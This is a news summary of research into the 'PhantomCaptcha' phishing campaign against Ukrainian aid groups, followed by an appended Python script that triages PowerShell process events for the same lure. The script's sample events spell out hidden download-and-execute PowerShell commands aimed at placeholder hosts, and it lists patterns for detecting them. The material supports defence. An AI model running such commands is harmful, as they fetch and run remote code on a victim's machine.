Particle.news

Researchers Expose 'PhantomCaptcha' Phishing That Hit Ukraine Aid Groups on Oct. 8

A fake Zoom site with a Cloudflare‑style check funneled victims into a three‑stage PowerShell‑driven compromise.

Overview

  • SentinelLABS and the Digital Security Lab of Ukraine detailed a one‑day October 8 campaign that targeted staff at Ukrainian regional administrations as well as ICRC, UNICEF and the Norwegian Refugee Council.
  • Emails impersonating the Ukrainian President’s Office carried weaponized PDFs that sent users to zoomconference.app, where a bogus CAPTCHA instructed them to copy and paste a token that executed a PowerShell command.
  • The infection chain delivered an obfuscated downloader, a reconnaissance profiler and a WebSocket‑based RAT capable of remote command execution and data exfiltration, with the RAT hosted on Russian infrastructure.
  • Operators pre‑registered domains months in advance, kept the public‑facing site active only on October 8 and maintained back‑end servers to manage any compromised hosts.
  • Researchers linked a related Android spyware cluster distributing princess.apk from princess-mens.click and noted overlaps with GTIG‑reported ColdRiver techniques and Russia/Belarus hosting indicators, while stopping short of attribution and urging defenses against paste‑and‑run lures, PowerShell abuse and suspicious WebSocket traffic.
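What a defender can do with the paste-and-run and PowerShell indicators the last bullet points at, as an added example that is not part of this article or of the SentinelLABS/DSLU report: a Python triage script that scores process-creation events for the shape of the lure described above (explorer.exe, where a Run-box paste lands, launching a hidden, policy-bypassing PowerShell that decodes or downloads and executes a further stage, including WebSocket client use). The simplified key=value log format, the four sample events, the placeholder domains (`*.invalid`, `*.example`), the stage-2 text and the weights and threshold are all constructed assumptions for the example, not indicators taken from the report.

```python
"""Heuristic triage of process-creation events for paste-and-run PowerShell
lures of the kind described above.  Added example, not code from the article
or the researchers; events, domains, weights and threshold are constructed."""
import base64
import re

# Constructed stage-2 text, used only to build the encoded sample event below.
STAGE2_PLAINTEXT = ("$w = New-Object Net.WebSockets.ClientWebSocket; "
                    "iex (New-Object Net.WebClient).DownloadString('https://stage2.invalid/p')")


def encode_ps(script: str) -> str:
    """Base64 of UTF-16LE text, the encoding powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events in a simplified Sysmon-like key=value format (not real logs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Run-box paste: explorer.exe spawns a hidden PowerShell that fetches and runs remote code.
    r'ParentImage=C:\Windows\explorer.exe Image=' + PS
    + r''' CommandLine="powershell.exe -w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient).DownloadString('https://captcha-check.invalid/verify')\""''',
    # Same lure, payload hidden behind -EncodedCommand.
    r'ParentImage=C:\Windows\explorer.exe Image=' + PS
    + ' CommandLine="powershell.exe -NoP -W Hidden -EncodedCommand ' + encode_ps(STAGE2_PLAINTEXT) + '"',
    # Benign: a maintenance script started from a console.
    r'ParentImage=C:\Windows\System32\cmd.exe Image=' + PS + ' CommandLine="powershell.exe -File nightly-backup.ps1"',
    # Benign: an interactive download; a single fetch primitive alone stays below threshold.
    r'ParentImage=C:\Windows\System32\cmd.exe Image=' + PS
    + ' CommandLine="powershell.exe -Command Invoke-WebRequest -Uri https://updates.example/tool.zip -OutFile tool.zip"',
]

KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
# Covers -e / -ec / -enc / -EncodedCommand; PowerShell also accepts other unambiguous prefixes.
ENCODED = re.compile(r'-e(?:nc(?:odedcommand)?|c)?\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)

RUN_BOX_PARENTS = {"explorer.exe"}          # Win+R / Run dialog pastes are children of explorer.exe
INDICATORS = [                              # (pattern, label, weight) -- constructed weights
    (r"-w(?:indowstyle)?\s+hidden", "hidden window", 2),
    (r"-nop(?:rofile)?\b", "no profile", 1),
    (r"-e(?:xecutionpolicy|p)\s+bypass", "execution policy bypass", 1),
    (r"\biex\b|invoke-expression", "in-memory execution (IEX)", 2),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod", "remote fetch", 2),
    (r"net\.websockets|clientwebsocket", "WebSocket client", 2),
]
SUSPICIOUS_THRESHOLD = 5


def parse_event(line: str) -> dict:
    """Split one key=value event line into a dict, unescaping quoted values."""
    fields = {}
    for key, value in KV.findall(line):
        if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            value = value[1:-1].replace('\\"', '"')
        fields[key] = value
    return fields


def decode_encoded_command(cmdline: str):
    """Return the plaintext behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event: dict):
    """Weighted indicator match over the command line and any decoded payload."""
    score, reasons = 0, []
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent in RUN_BOX_PARENTS:
        score += 3
        reasons.append(f"launched by {parent} (consistent with a Run-box paste)")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        score += 2
        reasons.append("encoded command decoded")
    haystack = cmd if decoded is None else cmd + "\n" + decoded
    for pattern, label, weight in INDICATORS:
        if re.search(pattern, haystack, re.IGNORECASE):
            score += weight
            reasons.append(label)
    return score, reasons, decoded


def triage(lines):
    """Score each event; anything at or above the threshold is flagged for review."""
    out = []
    for line in lines:
        ev = parse_event(line)
        score, reasons, decoded = score_event(ev)
        out.append({"parent": ev.get("ParentImage", ""), "score": score,
                    "verdict": "suspicious" if score >= SUSPICIOUS_THRESHOLD else "benign",
                    "reasons": reasons, "decoded": decoded})
    return out


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f'{r["verdict"]:10} score={r["score"]:2} {", ".join(r["reasons"]) or "-"}')
```

Run as-is it scores the four constructed events: the two Run-box lures land well above the threshold (the encoded one also surfaces the decoded WebSocket and download-and-execute text for the analyst), while the console-launched script and the interactive download stay below it. Feeding it real data means mapping the fields from Sysmon Event ID 1 or Security event 4688 with command-line auditing enabled, and tuning the weights to the environment; the parent-process and hidden-window signals carry the most weight here because a legitimate script rarely needs both.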